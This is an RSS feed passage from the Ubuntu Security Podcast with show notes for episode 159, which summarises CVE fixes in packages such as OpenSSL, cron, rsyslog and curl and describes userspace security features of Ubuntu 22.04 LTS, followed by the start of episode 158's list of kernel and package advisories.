        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>This week we bring you part 2 of our look at the new Ubuntu 22.04 LTS
release and what&rsquo;s in it for security, plus we cover security updates for
DPDK, OpenSSL, Cron, RSyslog, Curl and more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>37 unique CVEs addressed</p>
<h3 id="usn-5401-1-dpdk-vulnerabilities-00-54">[<a href="https://ubuntu.com/security/notices/USN-5401-1">USN-5401-1</a>] DPDK vulnerabilities [00:54]</h3>
<ul>
<li>2 CVEs addressed in Focal (20.04 LTS), Impish (21.10), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-0669">CVE-2022-0669</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3839">CVE-2021-3839</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Data-plane development kit (provides TCP offloading to userspace to
accelerate package processing workloads)</li>
<li>Used by openvswitch for OpenStack software defined networking</li>
<li>OOB write due to missing check on queue length in vhost comms - could
allow a malicious guest to crash or get code execution on the host</li>
<li>Also fixed a possible DoS attack between a malicious vhost-user primary
and secondary where the primary can spam the secondary with with a huge
number of open file-descriptors which eventually leads the secondary to
exhaust it&rsquo;s fd limit and hence DoS</li>
</ul>
<h3 id="usn-5402-1-openssl-vulnerabilities-01-36">[<a href="https://ubuntu.com/security/notices/USN-5402-1">USN-5402-1</a>] OpenSSL vulnerabilities [01:36]</h3>
<ul>
<li>4 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Impish (21.10), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-1473">CVE-2022-1473</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1434">CVE-2022-1434</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1343">CVE-2022-1343</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1292">CVE-2022-1292</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>All 4 affect 22.04 whilst only one affects the older releases - in this
case if running 22.04, exposed to 4 vulns whilst for the older releases
only 1
<ul>
<li>Would be interesting to try and compare number of CVEs over the
lifetime of a piece of software - if always running the latest version
do you get exposed to more and more CVEs each time you upgrade? Is it
better to stick with older software since the rate of vulns found over
time likely decreases as it gets older&hellip;</li>
</ul>
</li>
<li>Anyway, of these vulns 1 is a memory leak during certificate decoding
which could usually affect something like an TLS server which uses client
certs for authentication, plus a possible MiTM attack against RC4-MD5,
incorrect return code when validating OCSP messages which could cause a
user / application to believe was valid when in fact was not plus
possible code execution via the <code>c_rehash</code> script through
shell-metacharacters - but no privilege escalation so only get whatever
privileges the script is executing under (<code>c_rehash</code> is used to create
symlinks named as the hashes of certs etc when importing a cert into a
cert store so it can then easily be looked up via it&rsquo;s hash value as the
filename)</li>
</ul>
<h3 id="usn-5395-2-networkd-dispatcher-regression-03-44">[<a href="https://ubuntu.com/security/notices/USN-5395-2">USN-5395-2</a>] networkd-dispatcher regression [03:44]</h3>
<ul>
<li>2 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Impish (21.10), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-29800">CVE-2022-29800</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-29799">CVE-2022-29799</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-158/">Episode 158</a> - upstream fix contained a small regression where an error
would be encountered under certain situations</li>
</ul>
<h3 id="usn-5354-2-twisted-vulnerability-04-06">[<a href="https://ubuntu.com/security/notices/USN-5354-2">USN-5354-2</a>] Twisted vulnerability [04:06]</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-21716">CVE-2022-21716</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-156/">Episode 156</a> - Equivalent update for ESM releases plus latest Ubuntu LTS release</li>
</ul>
<h3 id="usn-5403-1-sqlite-vulnerability-04-20">[<a href="https://ubuntu.com/security/notices/USN-5403-1">USN-5403-1</a>] SQLite vulnerability [04:20]</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-36690">CVE-2021-36690</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Crash / possible code execution in CLI client when using a crafted
query - upstream dispute this as an actual vuln since if can execute
sqlite cli then can already execute arbitrary commands</li>
</ul>
<h3 id="usn-5405-1-jbig2dec-vulnerabilities-04-40">[<a href="https://ubuntu.com/security/notices/USN-5405-1">USN-5405-1</a>] jbig2dec vulnerabilities [04:40]</h3>
<ul>
<li>2 CVEs addressed in Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-12268">CVE-2020-12268</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-9216">CVE-2017-9216</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>used in ghostscript, mupdf and others for handling JBIG2 files</li>
<li>NULL ptr dereference -&gt; crash -&gt; DoS</li>
<li>Heap buffer overflow -&gt; crash / code execution</li>
</ul>
<h3 id="usn-5259-2-cron-vulnerabilities-04-58">[<a href="https://ubuntu.com/security/notices/USN-5259-2">USN-5259-2</a>] Cron vulnerabilities [04:58]</h3>
<ul>
<li>4 CVEs addressed in Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-9706">CVE-2019-9706</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9705">CVE-2019-9705</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9704">CVE-2019-9704</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-9525">CVE-2017-9525</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>DoS via a very large crontab file with many many lines or very long lines</li>
<li>Ubuntu specific vuln allowing possible privesc from crontab group to root
<strong>when the crontab package is upgraded</strong> via a symlink attack - so in general
was a dormant / latent vuln that would only be able to be triggered if a
sysadmin manually reinstalled cron <strong>or</strong> we released a new update 😁 - so
fixed now</li>
</ul>
<h3 id="usn-5259-3-cron-regression-05-47">[<a href="https://ubuntu.com/security/notices/USN-5259-3">USN-5259-3</a>] Cron regression [05:47]</h3>
<ul>
<li>4 CVEs addressed in Xenial ESM (16.04 ESM), Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-9706">CVE-2019-9706</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9705">CVE-2019-9705</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9704">CVE-2019-9704</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-9525">CVE-2017-9525</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>but unfortunately caused a minor regression where some harmless but
possibly scary looking error messages would be printed when cron was
upgraded - fixed with this further update</li>
</ul>
<h3 id="usn-5404-1-rsyslog-vulnerability-05-57">[<a href="https://ubuntu.com/security/notices/USN-5404-1">USN-5404-1</a>] Rsyslog vulnerability [05:57]</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Impish (21.10), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-24903">CVE-2022-24903</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Potential heap buffer overflow in TCP syslog reception - so a malicious
host which is logging to a centralized syslog server could possibly crash
or get code execution on the server (as the <code>syslog</code> user only)</li>
</ul>
<h3 id="usn-5244-2-dbus-vulnerability-06-18">[<a href="https://ubuntu.com/security/notices/USN-5244-2">USN-5244-2</a>] DBus vulnerability [06:18]</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-35512">CVE-2020-35512</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Possible UAF when running on a system where multiple usernames are mapped
to the same UID - if policy references these usernames, may free it via
one username whilst it is still being accessed by the other</li>
<li>Not really likely to encounter this setup or be able to easily exploit it</li>
</ul>
<h3 id="usn-5179-2-busybox-vulnerability-07-03">[<a href="https://ubuntu.com/security/notices/USN-5179-2">USN-5179-2</a>] BusyBox vulnerability [07:03]</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-28831">CVE-2021-28831</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-141/">Episode 141</a></li>
</ul>
<h3 id="usn-5407-1-cairo-vulnerabilities-07-10">[<a href="https://ubuntu.com/security/notices/USN-5407-1">USN-5407-1</a>] Cairo vulnerabilities [07:10]</h3>
<ul>
<li>4 CVEs addressed in Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-35492">CVE-2020-35492</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-6462">CVE-2019-6462</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-9814">CVE-2017-9814</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2016-9082">CVE-2016-9082</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>2 OOB reads, stack buffer overflow and infinite loop in handling of
crafted image / font files</li>
</ul>
<h3 id="usn-5408-1-dnsmasq-vulnerability-07-24">[<a href="https://ubuntu.com/security/notices/USN-5408-1">USN-5408-1</a>] Dnsmasq vulnerability [07:24]</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Impish (21.10), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-0934">CVE-2022-0934</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Heap-based UAF found by oss-fuzz when handling malicious DHCPv6 requests</li>
</ul>
<h3 id="usn-5409-1-libsndfile-vulnerability-07-46">[<a href="https://ubuntu.com/security/notices/USN-5409-1">USN-5409-1</a>] libsndfile vulnerability [07:46]</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-4156">CVE-2021-4156</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>OOB read in FLAC codec -&gt; crash / possible info leak</li>
</ul>
<h3 id="usn-5410-1-nss-vulnerability-07-54">[<a href="https://ubuntu.com/security/notices/USN-5410-1">USN-5410-1</a>] NSS vulnerability [07:54]</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-25648">CVE-2020-25648</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Mishandled <code>ChangeCipherSpec</code> messages in TLS 1.3 - remote client could
crash a server by sending multiple of these</li>
</ul>
<h3 id="usn-5411-1-firefox-vulnerabilities-08-06">[<a href="https://ubuntu.com/security/notices/USN-5411-1">USN-5411-1</a>] Firefox vulnerabilities [08:06]</h3>
<ul>
<li>8 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-29918">CVE-2022-29918</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-29917">CVE-2022-29917</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-29916">CVE-2022-29916</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-29915">CVE-2022-29915</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-29914">CVE-2022-29914</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-29912">CVE-2022-29912</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-29911">CVE-2022-29911</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-29909">CVE-2022-29909</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>100.0 - usual mix of issues for web browsers/rendering engines (XSS, RCE,
DoS, bypass permission checks etc)</li>
</ul>
<h3 id="usn-5412-1-curl-vulnerabilities-08-24">[<a href="https://ubuntu.com/security/notices/USN-5412-1">USN-5412-1</a>] curl vulnerabilities [08:24]</h3>
<ul>
<li>3 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Impish (21.10), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-27782">CVE-2022-27782</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-27781">CVE-2022-27781</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-27780">CVE-2022-27780</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>More curl vulns - seems to be more every 5-10 weeks or so lately -
fuzzing?
<ul>
<li>logic error on connection reuse could reuse an old connection after
parameters had been changed</li>
<li>Possible infinite loop when constructing a server&rsquo;s TLS cert chain -&gt;
DoS</li>
<li>incorrect handling of %-encoded URL separators - could parse URL
wrongly and so end up visiting wrong URL or bypassing access checks /
filters etc</li>
</ul>
</li>
<li>curl is part of <a href="https://hackerone.com/ibb/hacktivity?type=team">hackerone</a> and has so far paid out $17k USD in bounties</li>
<li>Whilst preparing this week&rsquo;s episode 6 more vulns were announced in curl</li>
<li>Interesting <a href="https://twitter.com/bagder/status/1524379653464592384">twitter thread</a> from curl maintainer on the ratio of vulns
which are due to C mistakes vs general programming logic mistakes -
general mistakes higher so I assume this is used as an argument as to why
implementing such a ubiquitous piece of software in such an unsafe
language is &ldquo;ok&rdquo; - can&rsquo;t say I agree</li>
<li>Also <a href="https://twitter.com/bagder/status/1524497676137598976">compared</a> how long it takes to find vulns from C mistakes vs non-C
mistakes - non-C mistakes take longer to find, presumably due to lack of
good tools for finding them (compared to say UBSan, Coverity etc for
finding C specific mistakes)</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="what-s-new-in-security-in-ubuntu-22-dot-04-lts--part-2--11-35">What&rsquo;s new in security in Ubuntu 22.04 LTS (part 2) [11:35]</h3>
<ul>
<li>In part 1 we covered new security features in the kernel</li>
<li>This week we look at userspace security improvements
<ul>
<li>OpenSSL 3
<ul>
<li>disables a lot of legacy algorithms by default, upstream have a
<a href="https://www.openssl.org/docs/manmaster/man7/migration_guide.html">migration guide</a> which explains the main changes from 1.1.1 as well
as how to enable the legacy provider if you still require access to
them</li>
<li>Default security level is still 2 but it now disables (D)TLS 1.2
protocols (and below)</li>
</ul>
</li>
<li>openssh 8.9
<ul>
<li>Lots of changes since 8.2 in 20.04 LTS, but in particular has
improved handling of FIDO/U2F hardware tokens - openssh in 20.04 LTS
first introduced support for FIDO/U2F tokens as 2FA for remote SSH
logins - basically would generate a new openssh key where the private
half of the key is only accessible with the FIDO/U2F token - this new
release brings support for using a PIN with the token <strong>and</strong> much better
improved UX so that users don&rsquo;t have to keep getting prompted for
their PIN each time. Plus supports verifying WebAuthn signatures</li>
</ul>
</li>
<li>nftables as default firewall backend
<ul>
<li>firewalling on Linux has 2 components - kernel-space mechanism and
userspace tooling to control that</li>
<li>traditionally kernel supported iptables (aka xtables - ip,ip6,arp,eb -tables)</li>
<li>nftables as introduced into the kernel in 3.13 as a new mechanism to
implement network packet classification and handling - aka firewalling
etc</li>
<li>kernel has 2 mechanisms then - xtables and nftables</li>
<li>userspace then has 2 primary tools for handling these - iptables for
xtables and nftables (nft) for nftables</li>
<li>iptables userspace added a nft backend so existing iptables rules and
users would be switched to that automatically - so can still use
traditional <code>iptables</code> command to configure firewall rules etc but they
will then be loaded into the kernel&rsquo;s <code>nft</code> backend rather than <code>xtables</code></li>
<li>also has a separate userspace command <code>nft</code> to directly configure <code>nft</code>
backend which supports more advanced rule types</li>
<li>Need to be careful that all tools which configure firewall rules use
the same backend in the kernel otherwise they may conflict and get
weird results</li>
</ul>
</li>
<li>gcc 11 with improved static analysis via <code>-fanalyzer</code>
<ul>
<li>Double free, UAF, free of non-heap memory, malloc leak, NULL ptr
deref, unsafe calls within signal handlers and more</li>
</ul>
</li>
<li>bash 5.1 - <code>$SRANDOM</code> vs <code>$RANDOM</code>
<ul>
<li>RANDOM is a psuedo-random number which comes internally from bash and
hence is deterministic based on the original seed value</li>
<li>SRANDOM is derived from the kernel&rsquo;s <code>/dev/urandom</code> and hence is not
reproducible / deterministic - ie. is actually more truly random</li>
</ul>
</li>
<li><a href="https://ubuntu.com/blog/private-home-directories-for-ubuntu-21-04">Private home directories by default</a></li>
</ul>
</li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E159.mp3" length="15367285" type="audio/mpeg" /><itunes:duration>1157</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 158
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-158/</link>
          <pubDate>Fri, 06 May 2022 16:46:00 +0930 </pubDate>
          <dc:creator></dc:creator>
          <guid>836608c25bd99f0c47f32c21cd7cd01fe44f01f7c56caab27fc7af02df27b3be53c185fb29188c7cf8612cde2df601a1520449a8e60fc6c576306542e78a9642</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 158</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          Microsoft's Nimbuspwn sets the Linux security media ablaze but where
  there's smoke there's not always fire, plus we bring you the first part of
  a 2 part series looking at some of the security features in the latest
  Ubuntu 22.04 LTS...
        
        ]]></itunes:subtitle>
        <itunes:summary>  Microsoft's Nimbuspwn sets the Linux security media ablaze but where
  there's smoke there's not always fire, plus we bring you the first part of
  a 2 part series looking at some of the security features in the latest
  Ubuntu 22.04 LTS release.
  </itunes:summary>
        <description>  Microsoft's Nimbuspwn sets the Linux security media ablaze but where
  there's smoke there's not always fire, plus we bring you the first part of
  a 2 part series looking at some of the security features in the latest
  Ubuntu 22.04 LTS release.
  </description>
        <googleplay:description>  Microsoft's Nimbuspwn sets the Linux security media ablaze but where
  there's smoke there's not always fire, plus we bring you the first part of
  a 2 part series looking at some of the security features in the latest
  Ubuntu 22.04 LTS release.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>Microsoft&rsquo;s Nimbuspwn sets the Linux security media ablaze but where
there&rsquo;s smoke there&rsquo;s not always fire, plus we bring you the first part of
a 2 part series looking at some of the security features in the latest
Ubuntu 22.04 LTS release.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>92 unique CVEs addressed</p>
<h3 id="usn-5381-1-linux-kernel--oem--vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5381-1">USN-5381-1</a>] Linux kernel (OEM) vulnerabilities</h3>
<ul>
<li>11 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-28356">CVE-2022-28356</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-27223">CVE-2022-27223</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-26966">CVE-2022-26966</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-26490">CVE-2022-26490</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-24958">CVE-2022-24958</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1048">CVE-2022-1048</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1016">CVE-2022-1016</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1011">CVE-2022-1011</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-0854">CVE-2022-0854</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-0494">CVE-2022-0494</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1015">CVE-2022-1015</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5383-1-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5383-1">USN-5383-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>8 CVEs addressed in Focal (20.04 LTS), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-24959">CVE-2022-24959</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-26878">CVE-2022-26878</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-24448">CVE-2022-24448</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1016">CVE-2022-1016</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-0617">CVE-2022-0617</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-44879">CVE-2021-44879</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-43976">CVE-2021-43976</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1015">CVE-2022-1015</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5384-1-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5384-1">USN-5384-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>3 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-24959">CVE-2022-24959</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-24448">CVE-2022-24448</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-0617">CVE-2022-0617</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5385-1-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5385-1">USN-5385-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>4 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-24959">CVE-2022-24959</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-24448">CVE-2022-24448</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-0617">CVE-2022-0617</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-43975">CVE-2021-43975</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5387-1-barbican-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5387-1">USN-5387-1</a>] Barbican vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-23452">CVE-2022-23452</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-23451">CVE-2022-23451</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5376-2-git-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-5376-2">USN-5376-2</a>] Git vulnerability</h3>
<ul>
<li>1 CVEs addressed in Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-24765">CVE-2022-24765</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5388-1-openjdk-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5388-1">USN-5388-1</a>] OpenJDK vulnerabilities</h3>
<ul>
<li>5 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Impish (21.10), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-21496">CVE-2022-21496</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21476">CVE-2022-21476</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21443">CVE-2022-21443</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21434">CVE-2022-21434</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21426">CVE-2022-21426</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5388-2-openjdk-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5388-2">USN-5388-2</a>] OpenJDK vulnerabilities</h3>
<ul>
<li>6 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Impish (21.10), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-21496">CVE-2022-21496</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21476">CVE-2022-21476</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21443">CVE-2022-21443</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21434">CVE-2022-21434</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21426">CVE-2022-21426</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21449">CVE-2022-21449</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5389-1-libcroco-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5389-1">USN-5389-1</a>] Libcroco vulnerabilities</h3>
<ul>
<li>4 CVEs addressed in Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-12825">CVE-2020-12825</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-8871">CVE-2017-8871</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-8834">CVE-2017-8834</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-7960">CVE-2017-7960</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5390-1-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5390-1">USN-5390-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>3 CVEs addressed in Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-26490">CVE-2022-26490</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1016">CVE-2022-1016</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1015">CVE-2022-1015</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5376-3-git-regression">[<a href="https://ubuntu.com/security/notices/USN-5376-3">USN-5376-3</a>] Git regression</h3>
<ul>
<li>Affecting Bionic (18.04 LTS), Focal (20.04 LTS), Impish (21.10), Jammy (22.04 LTS)</li>
</ul>
<h3 id="usn-5391-1-libsepol-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5391-1">USN-5391-1</a>] libsepol vulnerabilities</h3>
<ul>
<li>4 CVEs addressed in Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-36087">CVE-2021-36087</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-36086">CVE-2021-36086</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-36085">CVE-2021-36085</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-36084">CVE-2021-36084</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5366-2-fribidi-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5366-2">USN-5366-2</a>] FriBidi vulnerabilities</h3>
<ul>
<li>3 CVEs addressed in Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-25310">CVE-2022-25310</a> <!-- raw HTML omitted --></li>
